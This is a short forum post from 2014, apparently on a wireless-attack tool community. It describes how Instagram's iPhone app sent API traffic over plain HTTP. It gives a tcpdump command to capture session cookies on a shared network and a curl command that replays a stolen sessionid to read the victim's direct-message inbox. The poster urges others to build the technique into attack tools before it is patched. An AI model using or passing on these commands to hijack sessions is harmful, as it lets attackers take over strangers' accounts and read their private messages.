guuzle Posted July 30, 2014 Share Posted July 30, 2014 As many already know, Instagram on iphones transmit its API over HTTP leaving session hijacking as an easy win. This is super simple to execute without a GUI but someone may want to create an infusion for this or include into trapcookie until it gets patched. tcpdump -In -i en0 -s 2048 -A dst i.instagram.com curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \-H 'Cookie: sessionid=CDSDFWE!242312' \https://i.instagram.com/api/v1/direct_share/inbox/` More details can be found here https://gist.github.com/stevegraham/9a98627eebd6b09d4483 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.